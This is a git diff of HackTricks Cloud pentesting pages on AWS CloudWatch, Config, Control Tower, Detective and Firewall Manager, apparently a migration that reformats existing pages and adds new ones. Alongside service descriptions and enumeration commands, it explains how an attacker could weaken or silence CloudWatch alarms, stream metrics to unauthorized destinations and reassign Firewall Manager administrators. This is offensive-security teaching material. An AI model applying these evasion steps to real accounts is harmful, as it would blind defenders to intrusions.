@@ -70,12 +57,12 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Features**: -* **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. -* **Customization**: Layout and content can be customized to fit specific monitoring needs. +- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. +- **Customization**: Layout and content can be customized to fit specific monitoring needs. **Example Use Case**: -* A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. +- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. ### Metric Stream and Metric Data @@ -85,8 +72,8 @@ Units are the measurement type associated with a metric. Units help to provide c **Example Use Case**: -* Sending real-time metrics to a third-party monitoring service for advanced analysis. -* Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. +- Sending real-time metrics to a third-party monitoring service for advanced analysis. +- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. ### Alarm 
@@ -94,14 +81,14 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Components**: -* **Threshold**: The value at which the alarm triggers. -* **Evaluation Periods**: The number of periods over which data is evaluated. -* **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm -* **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). +- **Threshold**: The value at which the alarm triggers. +- **Evaluation Periods**: The number of periods over which data is evaluated. +- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm +- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). **Example Use Case**: -* Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. +- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. ### Anomaly Detectors @@ -109,12 +96,12 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Components**: -* **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. -* **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. +- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. +- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. **Example Use Case**: -* Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. +- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. ### Insight Rules and Managed Insight Rules 
@@ -124,7 +111,7 @@ Units are the measurement type associated with a metric. Units help to provide c **Example Use Case**: -* Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. +- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. ### CloudWatch Logs 
@@ -146,9 +133,9 @@ In that case, CLoudWatch can be prepared to send an event and perform some autom You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. -* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -* **Configure** and **start** the CloudWatch Agent +- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage +- **Configure** and **start** the CloudWatch Agent A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. 
@@ -175,7 +162,7 @@ aws cloudwatch get-metric-data --metric-data-queries --start-time --metric-name [--dimensions ] --start-time --end-time --period ## Returns a list of the metric streams of your account -aws cloudwatch list-metric-streams +aws cloudwatch list-metric-streams ## Retrieves information about the specified metric stream aws cloudwatch get-metric-stream --name @@ -202,7 +189,7 @@ aws cloudwatch describe-anomaly-detectors [--namespace ] [--metric-name < ## Lists all the Contributor Insight rules in your account aws cloudwatch describe-insight-rules -## Retrieves the data collected over a time range for a given Contributor Insight rule +## Retrieves the data collected over a time range for a given Contributor Insight rule aws cloudwatch get-insight-rule-report --rule-name --start-time --end-time --period ## Lists managed Contributor Insights rules in your account for a specified resource 
@@ -243,11 +230,12 @@ aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [-- The following example shows how to make a metric alarm ineffective: -* This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. -* By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. +- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. +- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. + +{{#tabs }} +{{#tab name="Original Metric Alarm" }} -{% tabs %} -{% tab title="Original Metric Alarm" %} ```json { "Namespace": "AWS/EC2", 
@@ -258,9 +246,7 @@ The following example shows how to make a metric alarm ineffective: "Value": "i-01234567890123456" } ], - "AlarmActions": [ - "arn:aws:sns:us-east-1:123456789012:example_sns" - ], + "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], "ComparisonOperator": "GreaterThanThreshold", "DatapointsToAlarm": 4, "EvaluationPeriods": 6, @@ -271,9 +257,11 @@ The following example shows how to make a metric alarm ineffective: "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" } ``` -{% endtab %} -{% tab title="Modified Metric Alarm" %} +{{#endtab }} + +{{#tab name="Modified Metric Alarm" }} + ```json { "Namespace": "AWS/EC2", @@ -294,10 +282,10 @@ The following example shows how to make a metric alarm ineffective: "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" } - ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. 
@@ -307,7 +295,7 @@ By deleting alarm actions, the attacker could prevent critical alerts and automa In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. -* If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. +- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. ```bash aws cloudwatch disable-alarm-actions --alarm-names 
@@ -328,52 +316,56 @@ aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: -* **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. -* **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. -* **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. +- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. +- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. +- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. 
@@ -459,21 +451,8 @@ aws cloudwatch untag-resource --resource-arn --tag-keys ## References -* [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) -* [https://docs.aws.amazon.com/es\_es/AmazonCloudWatch/latest/monitoring/cloudwatch\_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) +- [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) +- [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md index 3736b5511..55b736e3a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md @@ -1,19 +1,6 @@ # AWS - Config Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS Config 
@@ -21,11 +8,11 @@ AWS Config **capture resource changes**, so any change to a resource supported b A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. -* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. 
AWS Config uses the same API calls to get the same information. -* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. +- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. +- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance +- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. +- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. +- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. 
**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. 
@@ -37,36 +24,23 @@ A configuration item or **CI** as it's known, is a key component of AWS Config. ### Functioning -* When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config -* Stores everything in S3 bucket -* Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings -* Lambda feeds back to Config -* If rule has been broken, Config fires up an SNS +- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config +- Stores everything in S3 bucket +- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings +- Lambda feeds back to Config +- If rule has been broken, Config fires up an SNS -![](<../../../../.gitbook/assets/image (126).png>) +![](<../../../../images/image (126).png>) ### Config Rules Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. 
-* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -* **Custom rules**: You can create your own rules to check specific customconfigurations. +- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. +- **Custom rules**: You can create your own rules to check specific customconfigurations. Limit of 50 config rules per region before you need to contact AWS for an increase.\ Non compliant results are NOT deleted. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md new file mode 100644 index 000000000..bbb19dd0a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md 
@@ -0,0 +1,42 @@ +# AWS - Control Tower Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Control Tower + +> [!NOTE] +> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them. + +AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. + +AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. + +With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. + +In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. + +Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. 
+ +### Enumeration + +For enumerating controltower controls, you first need to **have enumerated the org**: + +{{#ref}} +../aws-organizations-enum.md +{{#endref}} + +```bash +# Get controls applied in an account +aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ +``` + +> [!WARNING] +> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts + +### Post Exploitation & Persistence + +{{#ref}} +../../aws-post-exploitation/aws-control-tower-post-exploitation.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md new file mode 100644 index 000000000..579789482 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -0,0 +1,15 @@ +# AWS - Cost Explorer Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Cost Explorer and Anomaly detection + +This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ +Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. + +### Budgets + +Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ +Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md new file mode 100644 index 000000000..44633cf30 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -0,0 +1,16 @@ +# AWS - Detective Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Detective + +**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. + +The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. + +## References + +- [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) +- [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md similarity index 81% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index 8c2d01c88..842501e7f 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -1,19 +1,6 @@ # AWS - Firewall Manager Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Firewall Manager 
@@ -25,8 +12,8 @@ A **rule group** (a collection of WAF rules) can be incorporated into an AWS Fir AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: -* **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. -* **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. +- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. +- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. 
@@ -63,31 +50,31 @@ AWS Firewall Manager offers flexibility in managing firewall resources within yo **Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include: -* Accounts or organizational units (OUs) that the administrator can apply policies to. -* Regions where the administrator can perform actions. -* Firewall Manager policy types that the administrator can manage. +- Accounts or organizational units (OUs) that the administrator can apply policies to. +- Regions where the administrator can perform actions. +- Firewall Manager policy types that the administrator can manage. Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. There are two distinct types of administrator accounts, each serving specific roles and responsibilities: -* **Default Administrator:** - * The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. - * This account has the capability to manage third-party firewalls and possesses full administrative scope. - * It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. 
- * While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. -* **Firewall Manager Administrators:** - * These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. - * Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. - * Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. +- **Default Administrator:** + - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. + - This account has the capability to manage third-party firewalls and possesses full administrative scope. + - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. + - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. +- **Firewall Manager Administrators:** + - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. + - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. 
+ - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: -* First, each Firewall Administrator administrator account must revoke their own account. -* Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. -* To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. +- First, each Firewall Administrator administrator account must revoke their own account. +- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. +- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. ## Enumeration 
@@ -120,7 +107,7 @@ aws fms get-resource-set --identifier # ReadOnlyAccess policy is not en ## Retrieve the list of tags for a given resource aws fms list-tags-for-resource --resource-arn -## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. +## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. aws fms list-compliance-status --member-account-ids --resource-type # ReadOnlyAccess policy is not enough for this ## List the resources that are currently associated to a resource set 
@@ -182,9 +169,9 @@ aws fms get-violation-details --policy-id --member-account --res An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. -* The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. -* In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. -* The creation of a Firewall Manager administrator account can only be done by the organization's management account. +- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. +- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. +- The creation of a Firewall Manager administrator account can only be done by the organization's management account. ```bash aws fms associate-admin-account --admin-account 
